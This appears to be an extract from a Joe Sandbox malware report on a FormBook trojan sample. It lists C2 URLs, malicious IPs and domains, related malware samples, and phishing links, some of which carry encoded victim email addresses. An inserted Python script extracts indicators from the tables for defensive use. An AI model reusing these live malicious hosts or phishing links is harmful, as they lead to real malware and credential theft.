http://www.northshorehousekeeping.com/dy13/ | explorer.exe, 00000004.00000002.4457795777.000000000C81C000.00000004.00000001.00020000.00000000.sdmp | false | Avira URL Cloud: safe | unknown
http://www.nearmeacupuncture.com/dy13/www.serco2020.com | explorer.exe, 00000004.00000002.4457795777.000000000C81C000.00000004.00000001.00020000.00000000.sdmp | false | Avira URL Cloud: safe | unknown
http://www.nearmeacupuncture.com/dy13/ | explorer.exe, 00000004.00000002.4457795777.000000000C81C000.00000004.00000001.00020000.00000000.sdmp | false | Avira URL Cloud: safe | unknown
http://www.mrwine.xyz | explorer.exe, 00000004.00000002.4457795777.000000000C81C000.00000004.00000001.00020000.00000000.sdmp | false | Avira URL Cloud: safe | unknown
http://www.tyupok.xyz | explorer.exe, 00000004.00000002.4457795777.000000000C81C000.00000004.00000001.00020000.00000000.sdmp | false | Avira URL Cloud: safe | unknown
http://www.byfchfyr.xyz/dy13/www.txglobedev.com | explorer.exe, 00000004.00000002.4457795777.000000000C81C000.00000004.00000001.00020000.00000000.sdmp | false | Avira URL Cloud: safe | unknown
http://www.byfchfyr.xyz/dy13/ | explorer.exe, 00000004.00000002.4457795777.000000000C81C000.00000004.00000001.00020000.00000000.sdmp | false | Avira URL Cloud: safe | unknown
http://www.jesuscrewofficial.com/dy13/www.nestormediaproduction.com | explorer.exe, 00000004.00000002.4457795777.000000000C81C000.00000004.00000001.00020000.00000000.sdmp | false | Avira URL Cloud: safe | unknown
http://www.cioncarp4213.com/dy13/www.520yhy.com | explorer.exe, 00000004.00000002.4457795777.000000000C81C000.00000004.00000001.00020000.00000000.sdmp | false | Avira URL Cloud: safe | unknown
http://www.tyupok.xyzReferer: | explorer.exe, 00000004.00000002.4457795777.000000000C81C000.00000004.00000001.00020000.00000000.sdmp | false | Avira URL Cloud: safe | unknown
http://www.cfuhtkwo.xyzReferer: | explorer.exe, 00000004.00000002.4457795777.000000000C81C000.00000004.00000001.00020000.00000000.sdmp | false
                                          • Avira URL Cloud: safe
                                          unknown
                                          http://www.mrwine.xyzReferer:explorer.exe, 00000004.00000002.4457795777.000000000C81C000.00000004.00000001.00020000.00000000.sdmpfalse
                                          • Avira URL Cloud: safe
                                          unknown
                                          https://outlook.comexplorer.exe, 00000004.00000002.4455199777.0000000009D42000.00000004.00000001.00020000.00000000.sdmp, explorer.exe, 00000004.00000003.3094852288.0000000009BA0000.00000004.00000001.00020000.00000000.sdmp, explorer.exe, 00000004.00000000.2007606048.0000000009BA0000.00000004.00000001.00020000.00000000.sdmp, explorer.exe, 00000004.00000003.3776759138.0000000009C96000.00000004.00000001.00020000.00000000.sdmp, explorer.exe, 00000004.00000003.3096442625.0000000009C92000.00000004.00000001.00020000.00000000.sdmpfalse
                                          • Avira URL Cloud: safe
                                          unknown
                                          http://www.cioncarp4213.comReferer:explorer.exe, 00000004.00000002.4457795777.000000000C81C000.00000004.00000001.00020000.00000000.sdmpfalse
                                          • Avira URL Cloud: safe
                                          unknown
                                          http://www.northshorehousekeeping.comexplorer.exe, 00000004.00000002.4457795777.000000000C81C000.00000004.00000001.00020000.00000000.sdmpfalse
                                          • Avira URL Cloud: safe
                                          unknown
                                          http://www.bum-arch.comReferer:explorer.exe, 00000004.00000002.4457795777.000000000C81C000.00000004.00000001.00020000.00000000.sdmpfalse
                                          • Avira URL Cloud: safe
                                          unknown
                                          http://www.jesuscrewofficial.comexplorer.exe, 00000004.00000002.4457795777.000000000C81C000.00000004.00000001.00020000.00000000.sdmpfalse
                                          • Avira URL Cloud: safe
                                          unknown
                                          http://www.520yhy.com/dy13/www.byfchfyr.xyzexplorer.exe, 00000004.00000002.4457795777.000000000C81C000.00000004.00000001.00020000.00000000.sdmpfalse
                                          • Avira URL Cloud: safe
                                          unknown
                                          http://www.520yhy.comReferer:explorer.exe, 00000004.00000002.4457795777.000000000C81C000.00000004.00000001.00020000.00000000.sdmpfalse
                                          • Avira URL Cloud: safe
                                          unknown
                                          http://www.whysco.com/dy13/explorer.exe, 00000004.00000002.4457795777.000000000C81C000.00000004.00000001.00020000.00000000.sdmpfalse
                                          • Avira URL Cloud: safe
                                          unknown
                                          http://www.tyupok.xyz/dy13/explorer.exe, 00000004.00000002.4457795777.000000000C81C000.00000004.00000001.00020000.00000000.sdmpfalse
                                          • Avira URL Cloud: safe
                                          unknown
                                          http://www.serco2020.com/dy13/explorer.exe, 00000004.00000002.4457795777.000000000C81C000.00000004.00000001.00020000.00000000.sdmpfalse
                                          • Avira URL Cloud: safe
                                          unknown
                                          https://android.notify.windows.com/iOSexplorer.exe, 00000004.00000000.2005162964.00000000076F8000.00000004.00000001.00020000.00000000.sdmp, explorer.exe, 00000004.00000002.4452340558.00000000076F8000.00000004.00000001.00020000.00000000.sdmpfalse
                                          • URL Reputation: safe
                                          unknown
                                          http://www.cfuhtkwo.xyzexplorer.exe, 00000004.00000002.4457795777.000000000C81C000.00000004.00000001.00020000.00000000.sdmpfalse
                                          • Avira URL Cloud: safe
                                          unknown
                                          http://www.serco2020.comReferer:explorer.exe, 00000004.00000002.4457795777.000000000C81C000.00000004.00000001.00020000.00000000.sdmpfalse
                                          • Avira URL Cloud: safe
                                          unknown
                                          http://www.jesuscrewofficial.comReferer:explorer.exe, 00000004.00000002.4457795777.000000000C81C000.00000004.00000001.00020000.00000000.sdmpfalse
                                          • Avira URL Cloud: safe
                                          unknown
                                          http://www.txglobedev.comReferer:explorer.exe, 00000004.00000002.4457795777.000000000C81C000.00000004.00000001.00020000.00000000.sdmpfalse
                                          • Avira URL Cloud: safe
                                          unknown
                                          http://www.txglobedev.com/dy13/explorer.exe, 00000004.00000002.4457795777.000000000C81C000.00000004.00000001.00020000.00000000.sdmpfalse
                                          • Avira URL Cloud: safe
                                          unknown
                                          http://www.northshorehousekeeping.comReferer:explorer.exe, 00000004.00000002.4457795777.000000000C81C000.00000004.00000001.00020000.00000000.sdmpfalse
                                          • Avira URL Cloud: safe
                                          unknown
                                          http://www.tyupok.xyz/dy13/www.cpuk-finance.comexplorer.exe, 00000004.00000002.4457795777.000000000C81C000.00000004.00000001.00020000.00000000.sdmpfalse
                                          • Avira URL Cloud: safe
                                          unknown
                                          https://api.msn.com/explorer.exe, 00000004.00000000.2007606048.0000000009ADB000.00000004.00000001.00020000.00000000.sdmp, explorer.exe, 00000004.00000002.4454444252.0000000009ADB000.00000004.00000001.00020000.00000000.sdmp, explorer.exe, 00000004.00000003.3094852288.0000000009ADB000.00000004.00000001.00020000.00000000.sdmpfalse
                                          • URL Reputation: safe
                                          unknown
                                          http://www.serco2020.comexplorer.exe, 00000004.00000002.4457795777.000000000C81C000.00000004.00000001.00020000.00000000.sdmpfalse
                                          • Avira URL Cloud: safe
                                          unknown
                                          http://www.cpuk-finance.com/dy13/explorer.exe, 00000004.00000002.4457795777.000000000C81C000.00000004.00000001.00020000.00000000.sdmpfalse
                                          • Avira URL Cloud: safe
                                          unknown
                                          http://www.nearmeacupuncture.comReferer:explorer.exe, 00000004.00000002.4457795777.000000000C81C000.00000004.00000001.00020000.00000000.sdmpfalse
                                          • Avira URL Cloud: safe
                                          unknown
                                          http://www.nestormediaproduction.com/dy13/www.bum-arch.comexplorer.exe, 00000004.00000002.4457795777.000000000C81C000.00000004.00000001.00020000.00000000.sdmpfalse
                                          • Avira URL Cloud: safe
                                          unknown
                                          http://www.whysco.comReferer:explorer.exe, 00000004.00000002.4457795777.000000000C81C000.00000004.00000001.00020000.00000000.sdmpfalse
                                          • Avira URL Cloud: safe
                                          unknown
                                          http://crl.vexplorer.exe, 00000004.00000002.4449069859.0000000000F13000.00000004.00000020.00020000.00000000.sdmp, explorer.exe, 00000004.00000000.2002630977.0000000000F13000.00000004.00000020.00020000.00000000.sdmpfalse
                                          • Avira URL Cloud: safe
                                          unknown
                                          http://www.mrwine.xyz/dy13/www.cioncarp4213.comexplorer.exe, 00000004.00000002.4457795777.000000000C81C000.00000004.00000001.00020000.00000000.sdmpfalse
                                          • Avira URL Cloud: safe
                                          unknown
                                          http://www.txglobedev.comexplorer.exe, 00000004.00000002.4457795777.000000000C81C000.00000004.00000001.00020000.00000000.sdmpfalse
                                          • Avira URL Cloud: safe
                                          unknown
                                          http://www.cfuhtkwo.xyz/dy13/www.tyupok.xyzexplorer.exe, 00000004.00000002.4457795777.000000000C81C000.00000004.00000001.00020000.00000000.sdmpfalse
                                          • Avira URL Cloud: safe
                                          unknown
IP | Domain | Country | ASN | ASN Name | Malicious
198.185.159.144 | ext-sq.squarespace.com | United States | 53831 | SQUARESPACE (US) | true
103.224.212.213 | www.serco2020.com | Australia | 133618 | TRELLIAN-AS-AP Trellian Pty Limited (AU) | true
128.1.131.130 | 021562413z.greycdn.net | United States | 135377 | UHGL-AS-AP UCloud HK Holdings Group Limited (HK) | true
188.114.97.3 | www.txglobedev.com | European Union | 13335 | CLOUDFLARENET (US) | true
154.204.100.23 | www.cfuhtkwo.xyz | Seychelles | 134705 | ITACE-AS-AP Itace International Limited (HK) | true
216.83.55.173 | winter.qnwoocaijo.com | United States | 64050 | BCPL-SG BGPNET Global ASN (SG) | true
3.64.163.50 | www.mrwine.xyz | United States | 16509 | AMAZON-02 (US) | true
185.151.30.212 | www.cpuk-finance.com | United Kingdom | 48254 | TWENTYI (GB) | true
103.8.70.95 | www.520yhy.com | China | 7575 | AARNET-AS-AP Australian Academic and Research Network (AARNet) | true
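Every C2 URL in the memory-string table above carries the verdict "false" and "Avira URL Cloud: safe", while the IP/domain table marks the hosts that actually resolved during the run as malicious. The per-URL reputation lookup only says the URL is not yet on a blocklist; the usable indicator is the structure the strings share: one short campaign path (/dy13/ here) repeated across a rotating list of hosts. The block below is an added example written for this edit, not code from Joe Sandbox or from the report. It takes a subset of the table rows, copied verbatim in their fused form as constructed input, separates the URL from the dump reference and verdict, strips the "Referer:" header fragment that follows some hosts, pulls out the campaign token, and joins the hosts against a hand-copied subset of the IP table. The campaign-token shape (CAMPAIGN_RE), the host-name shape (HOST_RE), the RESOLVED map and the reading of "/dy13/www.serco2020.com" as two adjacent strings (URL followed by the next host in the list) are assumptions of the example.

```python
import re
from urllib.parse import urlsplit

# Constructed input: rows copied from the memory-string table above in the
# fused form the report extraction produced (URL, dump reference(s), verdict).
MEMORY_ROWS = [
    "http://www.mrwine.xyz/dy13/explorer.exe, 00000004.00000002.4457795777.000000000C81C000.00000004.00000001.00020000.00000000.sdmpfalse",
    "http://www.nearmeacupuncture.com/dy13/www.serco2020.comexplorer.exe, 00000004.00000002.4457795777.000000000C81C000.00000004.00000001.00020000.00000000.sdmpfalse",
    "http://www.tyupok.xyzReferer:explorer.exe, 00000004.00000002.4457795777.000000000C81C000.00000004.00000001.00020000.00000000.sdmpfalse",
    "http://www.tyupok.xyz/dy13/www.cpuk-finance.comexplorer.exe, 00000004.00000002.4457795777.000000000C81C000.00000004.00000001.00020000.00000000.sdmpfalse",
    "http://www.nestormediaproduction.comexplorer.exe, 00000004.00000002.4457795777.000000000C81C000.00000004.00000001.00020000.00000000.sdmpfalse",
    "http://www.jesuscrewofficial.com/dy13/www.nestormediaproduction.comexplorer.exe, 00000004.00000002.4457795777.000000000C81C000.00000004.00000001.00020000.00000000.sdmpfalse",
    "http://www.serco2020.comReferer:explorer.exe, 00000004.00000002.4457795777.000000000C81C000.00000004.00000001.00020000.00000000.sdmpfalse",
    "https://outlook.comexplorer.exe, 00000004.00000002.4455199777.0000000009D42000.00000004.00000001.00020000.00000000.sdmp, explorer.exe, 00000004.00000003.3094852288.0000000009BA0000.00000004.00000001.00020000.00000000.sdmpfalse",
    "https://api.msn.com/explorer.exe, 00000004.00000000.2007606048.0000000009ADB000.00000004.00000001.00020000.00000000.sdmpfalse",
    "http://crl.vexplorer.exe, 00000004.00000002.4449069859.0000000000F13000.00000004.00000020.00020000.00000000.sdmpfalse",
]

# Constructed: domain -> (IP, ASN), copied from the IP/domain table above.
RESOLVED = {
    "www.serco2020.com": ("103.224.212.213", 133618),
    "www.mrwine.xyz": ("3.64.163.50", 16509),
    "www.cpuk-finance.com": ("185.151.30.212", 48254),
    "www.txglobedev.com": ("188.114.97.3", 13335),
}

ROW_RE = re.compile(
    r"^(?P<url>https?://.*?)"               # string found in memory (lazy)
    r"(?P<source>explorer\.exe, .*\.sdmp)"   # one or more dump references
    r"(?P<malicious>true|false)$"            # the report's Malicious column
)
# Assumed FormBook C2 path shape: a short alphanumeric campaign token between
# slashes, as in the /dy13/ paths of this report.
CAMPAIGN_RE = re.compile(r"^/(?P<campaign>[a-z0-9]{2,6})/(?P<rest>.*)$")
HOST_RE = re.compile(r"^[a-z0-9.-]+\.[a-z]{2,}$")   # assumed host-name shape


def parse_row(row):
    """Split one fused table row into URL, dump reference(s) and verdict."""
    m = ROW_RE.match(row)
    if m is None:
        return None
    url = m.group("url")
    # "Referer:" is the start of the next HTTP header template in the same
    # memory region, not part of the URL.
    if url.endswith("Referer:"):
        url = url[: -len("Referer:")]
    return {"url": url, "source": m.group("source"),
            "malicious": m.group("malicious") == "true"}


def split_c2(url):
    """Return (host, campaign token or None, adjacent host or None).

    Assumption: a host name that follows the campaign path was the next
    string in memory (another entry of the C2 host list), so it is reported
    as a second host rather than as part of the path.
    """
    parts = urlsplit(url)
    host = parts.netloc.lower()
    m = CAMPAIGN_RE.match(parts.path)
    if m is None:
        return host, None, None
    rest = m.group("rest").lower()
    adjacent = rest if HOST_RE.match(rest) else None
    return host, m.group("campaign"), adjacent


def extract_iocs(rows, resolved):
    """Campaign tokens, C2 hosts, remaining hosts and resolved C2 addresses."""
    campaigns, c2_hosts, all_hosts = set(), set(), set()
    for row in rows:
        rec = parse_row(row)
        if rec is None:
            continue
        host, campaign, adjacent = split_c2(rec["url"])
        all_hosts.add(host)
        if campaign is None:
            continue
        campaigns.add(campaign)
        c2_hosts.add(host)
        if adjacent:
            c2_hosts.add(adjacent)
            all_hosts.add(adjacent)
    return {
        "campaigns": sorted(campaigns),
        "c2_hosts": sorted(c2_hosts),
        # hosts never seen with a campaign path (OS/browser strings, fragments)
        "other_hosts": sorted(all_hosts - c2_hosts),
        "resolved": {h: resolved[h] for h in sorted(c2_hosts) if h in resolved},
    }


if __name__ == "__main__":
    for key, value in extract_iocs(MEMORY_ROWS, RESOLVED).items():
        print(f"{key}: {value}")
```

Hosts that only ever appear without the campaign path (outlook.com, api.msn.com, the truncated crl.v) fall into other_hosts, which is the right outcome: they are ordinary explorer.exe strings, not FormBook infrastructure, and blocking them from a raw string dump is a common false positive. A host such as www.tyupok.xyz, seen both with "Referer:" and with /dy13/, is still classified as C2 because one occurrence with the campaign path is enough.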
Joe Sandbox version: 40.0.0 Tourmaline
Analysis ID: 1467706
Start date and time: 2024-07-04 16:33:04 +02:00
Joe Sandbox product: CloudBasic
Overall analysis duration: 0h 11m 32s
Hypervisor based Inspection enabled: false
Report type: full
Cookbook file name: default.jbs
Analysis system description: Windows 10 x64 22H2 with Office Professional Plus 2019, Chrome 117, Firefox 118, Adobe Reader DC 23, Java 8 Update 381, 7zip 23.01
Number of new started processes analysed: 10
Number of new started drivers analysed: 0
Number of existing processes analysed: 0
Number of existing drivers analysed: 0
Number of injected processes analysed: 1
Technologies:
• HCA enabled
• EGA enabled
• AMSI enabled
Analysis Mode: default
Analysis stop reason: Timeout
Sample name: tYEY1UeurGz0Mjb.exe
Detection: MAL
Classification: mal100.troj.evad.winEXE@8/1@13/9
EGA Information:
• Successful, ratio: 100%
HCA Information:
• Successful, ratio: 100%
• Number of executed functions: 126
• Number of non-executed functions: 337
Cookbook Comments:
• Found application associated with file extension: .exe
• Override analysis time to 240000 for current running targets taking high CPU consumption
• Exclude process from analysis (whitelisted): dllhost.exe, WMIADAP.exe, SIHClient.exe, svchost.exe
• Excluded domains from analysis (whitelisted): fs.microsoft.com, ocsp.digicert.com, slscr.update.microsoft.com, ctldl.windowsupdate.com, fe3cr.delivery.mp.microsoft.com
• Not all processes were analyzed; the report is missing behavior information.
• Report creation exceeded maximum time and may have missing disassembly code information.
• Report size exceeded maximum capacity and may have missing behavior information.
• Report size getting too big, too many NtEnumerateKey calls found.
• Report size getting too big, too many NtOpenKey calls found.
• Report size getting too big, too many NtOpenKeyEx calls found.
• Report size getting too big, too many NtQueryValueKey calls found.
• VT rate limit hit for: tYEY1UeurGz0Mjb.exe
Time | Type | Description
10:33:49 | API Interceptor | 1x Sleep call for process: tYEY1UeurGz0Mjb.exe modified
10:33:57 | API Interceptor | 9829049x Sleep call for process: explorer.exe modified
10:34:33 | API Interceptor | 8978709x Sleep call for process: wlanext.exe modified
Match | Associated Sample Name / URL | Detection | Threat Name | Context
198.185.159.144 | Orden de compra 0307AR24.exe | malicious | FormBook | www.upcyclecharms.com/md02/?TPXh=Huvb14v0kOWfNfmpMWoBgNUO4U2JwQZ3Rl/9gDSI5Y6jcOUTIOoj4XqjJyszJ9ZVOt8xpVdhjQ==&nHLDZb=8p-HvnKhThQhTxm
198.185.159.144 | Att00173994.exe | malicious | FormBook | www.wearelemonpepper.com/e72r/
198.185.159.144 | disjR92Xrrnc3aZ.exe | malicious | FormBook | www.2thetcleaningservice.com/mc10/?FPWhWLW=JxJ83Varoc/pDqX/ejTG8SZAK8Thxjdz6WwKL+xsDsFdju7eAxYDUbfmaSdrJy7HwmgH2Kq9Hg==&AlB=8pdT8tsp
198.185.159.144 | 2024 Lusail Fence-WITH STICKER-2-003.exe | malicious | FormBook | www.lostaino.com/ts59/?7n=CMI3XAkyIIc+lbzQFM0yBiMxIQj45W/6BGDFfPoe8SD5h+4DN1QfAHIl1f4AVZ60VX6NCS7/mA==&2d8=3fe8kxnx8zVX-2L
198.185.159.144 | INVOICE - MV CNC BANGKOK - ST24PJ-278.exe | malicious | FormBook | www.amycostellospeech.com/ps94/?F8LpzZ=Z8xr6Td5qC+h9r+P8xpcNx+5AFGRik/pzejMl2EQ43koTqqLsxs6TtkvjcUWJXi0kPax//YTLQ==&XPa=ABZ4lrqh9bG4uhdP
198.185.159.144 | Att0027592.exe | malicious | FormBook | www.wearelemonpepper.com/e72r/
198.185.159.144 | kpCSGLBxAw2RnrW.exe | malicious | FormBook | www.bankablebark.com/dy13/?jDHph=9ZSG7Fw6wFJMggGvtga1Qh3mQQl9Rgy3K16+Oe6KY82/n3IrznmlP/WDuEbFz6mxdG1sfeS45g==&Wt=IBZX4leh3ZCl
198.185.159.144 | DHL_AWB#6078538091.exe | malicious | FormBook | www.wearelemonpepper.com/e72r/
198.185.159.144 | AWB_NO_907853880911.exe | malicious | FormBook | www.wearelemonpepper.com/e72r/
198.185.159.144 | IZPnmcCu5EZWa98.exe | malicious | FormBook | www.nearmeacupuncture.com/dy13/?Rzr=Lbyx94Ip0tNX&alI=COXK5yT9Xx7VrCeWTqQC1HikmuY3GWnRD5VN4SaGvnHzB3wzqzXgI63okZhLDtLx1kx2
103.224.212.213 | yPURXYpFVuXra2o.exe | malicious | FormBook | www.bolinkpass.club/cr12/?XDHHT=vl9/KZA8hSVZlZYYRwiRPHDwK+fMeRW7mLcdcO2HrZ8WCY+A9QkbN6YtC02r8Olco4RS&MZt0=njKl2H4htFXPs
103.224.212.213 | Ajanlatkeres_2024.05.29.PDF.exe | malicious | FormBook, Lokibot | www.vivaness.club/dn03/?KvOx3=rTguiTyPWe+LQ3wbOsvLrlRt5HkRD6mO+8zHcQ1TTPZ93ZKF8Svri6qQbYlnCi86X6wl&LhEx=ODKXZDVpY2w8gpmp
103.224.212.213 | Solicitud de pedido Documento No 168646080.exe | malicious | FormBook, PureLog Stealer | www.yassa-hany.online/pz08/?cx=QdC7EAnI8ZBK6KsnIEDwiNoe1wSidTgePl3trAKN/Agbi7tcJn0SHRDVuMZpBqNAn8DKeRhHzw==&CR=_DHhAtX
103.224.212.213 | DHL Factura Electronica Pendiente documento No 04BB25083.exe | malicious | FormBook, PureLog Stealer | www.yassa-hany.online/pz08/?N6Ahw=3ffl2F0Punah42&Ap=QdC7EAnI8ZBK6KsnIEDwiNoe1wSidTgePl3trAKN/Agbi7tcJn0SHRDVuP1PGrx4qdiR
103.224.212.213 | PaDQmSw2ud.dll | malicious | Laplas Clipper | searchseedphase.online/bot/regex
103.224.212.213 | PaDQmSw2ud.dll | malicious | Laplas Clipper | searchseedphase.online/bot/regex
103.224.212.213 | Documento de confirmacion de orden de compra OC 1580070060.exe | malicious | FormBook | www.yassa-hany.online/pz08/?mzrPV4R=QdC7EAnI8ZBK6KsnIEDwiNoe1wSidTgePl3trAKN/Agbi7tcJn0SHRDVuMVpBqNDhq+c&Rl=8pFP0r98Chvt5p5P
103.224.212.213 | 2024-09C33T37.exe | malicious | FormBook | www.jeffwertdesign.com/ve92/?K2M8bVC=FFlo4/TKNXAR7V12oAudCGusg/tK2zFE/4uuQQ9Wgy0sGP4AKi+QV1PLyZgh2gAJGU7I&tXC=BDK02VJ87dHtUzo
103.224.212.213 | rBCPcomprobante.exe | malicious | FormBook | www.yassa-hany.online/pz08/?CrFT7j=ftx8Clc09Ned3F&pR-l7PfH=QdC7EAnI8ZBK6KsnIEDwiNoe1wSidTgePl3trAKN/Agbi7tcJn0SHRDVuMVQNLhAw6fb
103.224.212.213 | Proforma_Invoice.exe | malicious | DBatLoader, FormBook | www.epansion.com/ao65/?BR-hMX=rvO+ATiOvXVjo/S2H7FppiqdWdEaFhxw3FA4xmox9z3FoZLInDsOyhar+a5ltJSnpB6j&Gzu=sFNxH
Match | Associated Sample Name / URL | Detection | Threat Name | Context
www.cfuhtkwo.xyz | aAEsSBx24sxHhRz.exe | malicious | FormBook | 154.204.100.23
winter.qnwoocaijo.com | lhDCR5RvXwLbWQu.exe | malicious | FormBook | 96.43.100.175
www.520yhy.com | aAEsSBx24sxHhRz.exe | malicious | FormBook | 103.8.70.95
www.520yhy.com | kpCSGLBxAw2RnrW.exe | malicious | FormBook | 103.8.70.95
www.mrwine.xyz | kpCSGLBxAw2RnrW.exe | malicious | FormBook | 3.64.163.50
www.cpuk-finance.com | aAEsSBx24sxHhRz.exe | malicious | FormBook | 185.151.30.212
www.cpuk-finance.com | mQY9ka5sW6hv2Ri.exe | malicious | FormBook | 185.151.30.212
www.cpuk-finance.com | kpCSGLBxAw2RnrW.exe | malicious | FormBook | 185.151.30.212
www.cpuk-finance.com | lhDCR5RvXwLbWQu.exe | malicious | FormBook | 185.151.30.212
www.cpuk-finance.com | IZPnmcCu5EZWa98.exe | malicious | FormBook | 185.151.30.212
www.cpuk-finance.com | cca9sXT33VsAEdu.exe | malicious | FormBook | 185.151.30.212
www.txglobedev.com | IZPnmcCu5EZWa98.exe | malicious | FormBook | 188.114.96.3
ext-sq.squarespace.com | Orden de compra 0307AR24.exe | malicious | FormBook | 198.185.159.144
ext-sq.squarespace.com | Att00173994.exe | malicious | FormBook | 198.185.159.144
ext-sq.squarespace.com | disjR92Xrrnc3aZ.exe | malicious | FormBook | 198.185.159.144
ext-sq.squarespace.com | 2024 Lusail Fence-WITH STICKER-2-003.exe | malicious | FormBook | 198.185.159.144
ext-sq.squarespace.com | INVOICE - MV CNC BANGKOK - ST24PJ-278.exe | malicious | FormBook | 198.185.159.144
ext-sq.squarespace.com | Att0027592.exe | malicious | FormBook | 198.185.159.144
ext-sq.squarespace.com | kpCSGLBxAw2RnrW.exe | malicious | FormBook | 198.185.159.144
ext-sq.squarespace.com | DHL_AWB#6078538091.exe | malicious | FormBook | 198.185.159.144
ext-sq.squarespace.com | MT103-746394.doc | malicious | FormBook | 198.185.159.144
ext-sq.squarespace.com | SecuriteInfo.com.Exploit.CVE-2018-0798.4.23906.18593.rtf | malicious | FormBook | 198.185.159.145
shops.myshopify.com | http://kuurza.com | malicious | Unknown | 23.227.38.74
shops.myshopify.com | 03.07.2024-sipari#U015f UG01072410 - Onka ve Tic a.s .exe | malicious | FormBook | 23.227.38.74
shops.myshopify.com | GJRX21GBj3.exe | malicious | FormBook | 23.227.38.74
shops.myshopify.com | 8bwKawHg0Z.exe | malicious | FormBook | 23.227.38.74
shops.myshopify.com | aAEsSBx24sxHhRz.exe | malicious | FormBook | 23.227.38.74
shops.myshopify.com | 2024 Lusail Fence-WITH STICKER-2-003.exe | malicious | FormBook | 23.227.38.74
shops.myshopify.com | Fiyat ARH-43010386.pdf2400120887000033208 'd#U0131r. PO 1310098007.exe | malicious | FormBook | 23.227.38.74
shops.myshopify.com | Document TOP19928.exe | malicious | FormBook | 23.227.38.74
shops.myshopify.com | eiqj38BeRo.rtf | malicious | FormBook | 23.227.38.74
shops.myshopify.com | Order-1351125X.docx.doc | malicious | FormBook | 23.227.38.74
Match | Associated Sample Name / URL | Detection | Threat Name | Context
CLOUDFLARENET (US) | https://www.newschoolers.com/click?news=50302&u=http://t.email1.gct.com/r/?id=hfffbb46%2Cc90b147%2Cc90b14f%26jobcode=739-0055%26omtr_camp=em%3ACORP%3APREN%3ASPROD%3A268417862%3Agcc_DM212754%3A739-0055%26lpg=xcBOkfEbudlaXz7yNVldPQ%3D%3D%26cid=gcc_DM212754%26bid=268417862%26rid=1061475%26p1=%41%4E%54oniopneus.com.br/dayo/uevcx/captcha/bWF0cy5hcnRodXJzc29uQHF1aWx0ZXJjaGV2aW90LmNvbQ==$%C3%A3%E2%82%AC%E2%80%9A | malicious | HTMLPhisher | 188.114.96.3
CLOUDFLARENET (US) | https://t.apemail.net/c/nqkr6vk3kzmvyhqvdmdrwaabbycqmbacainqogyhdmkxs5qvdmkqcvagayhveflk-nqdbwfkcivnrkgyvpf3bkgygamaa4bqedmcagbahdmdrwbqbaibq4aypdmdrwby3cupvkw2wlfob4fi3a4nvsqs3lmnrkyl6ojqbozlsm54gkyyvdmaacdqfaycaeaq3cvpugq2hiqgrqgc6ljdvwvsfkjjveu2skjmuixszlamviwc2dfkukgcai4nfiwczinjfsqyylnmfqryylzmvguspdfpugws3cunugrkckinqaaqcdmkxs5qvdnmuew23dnmuew23dnmuew23dnmuew23dmkqcvagayhveflk | malicious | HTMLPhisher | 104.17.2.184
CLOUDFLARENET (US) | 0NJYTCJYLo.exe | malicious | AgentTesla, PureLog Stealer | 104.26.13.205
CLOUDFLARENET (US) | https://nmg.evlink21.net/ | malicious | Unknown | 104.21.80.92
CLOUDFLARENET (US) | http://kuurza.com | malicious | Unknown | 172.67.41.60
CLOUDFLARENET (US) | https://email.abad-ca.com/web/webmail4/#midlands.sales@aggregate.com | malicious | Unknown | 188.114.96.3
CLOUDFLARENET (US) | https://link.mail.beehiiv.com/ls/click?upn=u001.DTQiLe1mLQCNek4IXPrb3cd8am3-2BtbSaRRShUhZCbhF1FE2NDum-2B9YeqhMivZ-2FcIJGKdOjfqgyCSTZimAiOiNKkJG3N5vgYBNDNlk5YkmOU2XPb-2FKTFlF-2Fc7jFH7Nb8Q0JW6uJclJabjCcGs0cWdzdydwDpcxzScPZQBex7SofyQj6MGdYzEG8hbxGGqYt2bpR0NjPAx6JIYz6GJiSrQNg-3D-3DNN1n_VW5ZEdFpCuXmC2nf4fwMfiBmdui0O95PSMmp4s-2F2oS3jvSHISWr6XQl8RtHpD7TWmHpRBlT8NsCamUZaroeFibjayeskXeuNnFhPFOon1-2FD6SmbcpIEUC7jghzzXsggajKIODB16RJEeGNz4SFHe6mT-2Bn59v08ju13fD9NtKJQcr97qiQNjiGiaoQJcvN3gUurUBqLZp9I4f9bNW54ZUVVCzpwaogbLaWcL9oScbt8r4Ku34t9zOqlF27gTqXVf6T2MbNMKkoCYnb-2BuL8kIZdyoRM3EFOIuktrG5gMH3OTa1K2klBhmxFOQ2d7plqd5asAi8Ofl9YcYOh-2FL4f45riCQtSdd7jru06EkHcBuJahi-2BD3xm-2F7PbjpIpmn-2Bu7KYdjQeOSKE-2FSiD6UNxc7JQNRWkdnK1RTC7eoEMZms82uCa8fJQIoMgqBt91NrcdZIDONaGhhpHXRhQ1VbYp5h6Cow-3D-3D#?email=Y2hyaXMuY291dHVAYWxnb21hLmNvbQ== | malicious | HTMLPhisher | 104.17.25.14
CLOUDFLARENET (US) | SecuriteInfo.com.Trojan.AutoIt.1410.29083.29061.exe | malicious | Stealerium | 104.16.185.241
CLOUDFLARENET (US) | http://GRi-Simulations-Inc-capital-project-proposalonline-secure.yurtdaslarbinicilik.com | malicious | HTMLPhisher | 104.17.25.14
CLOUDFLARENET (US) | Order 0003994887588960600000.bat.exe | malicious | GuLoader | 172.67.74.152
TRELLIAN-AS-AP Trellian Pty Limited (AU) | SOA 020724.exe | malicious | FormBook | 103.224.182.250
TRELLIAN-AS-AP Trellian Pty Limited (AU) | Inquiry No PJO-4010574.exe | malicious | FormBook | 103.224.182.250
TRELLIAN-AS-AP Trellian Pty Limited (AU) | http://pollyfill.io | malicious | Unknown | 103.224.182.252
TRELLIAN-AS-AP Trellian Pty Limited (AU) | rPRESUPUESTO.exe | malicious | FormBook | 103.224.182.246
TRELLIAN-AS-AP Trellian Pty Limited (AU) | INVOICE - MV CNC BANGKOK - ST24PJ-278.exe | malicious | FormBook | 103.224.182.210
TRELLIAN-AS-AP Trellian Pty Limited (AU) | PO - 04755 .bat.exe | malicious | FormBook | 103.224.182.242
TRELLIAN-AS-AP Trellian Pty Limited (AU) | 288292021 ABB.exe | malicious | FormBook | 103.224.182.250
TRELLIAN-AS-AP Trellian Pty Limited (AU) | RITS Ref 3379-06.exe | malicious | FormBook | 103.224.182.250
TRELLIAN-AS-AP Trellian Pty Limited (AU) | Invoice_Payment.exe | malicious | FormBook | 103.224.182.246
TRELLIAN-AS-AP Trellian Pty Limited (AU) | NGL 3200-Phase 2- Strainer.exe | malicious | FormBook | 103.224.182.250
SQUARESPACE (US) | Orden de compra 0307AR24.exe | malicious | FormBook | 198.185.159.144
SQUARESPACE (US) | Att00173994.exe | malicious | FormBook | 198.185.159.144
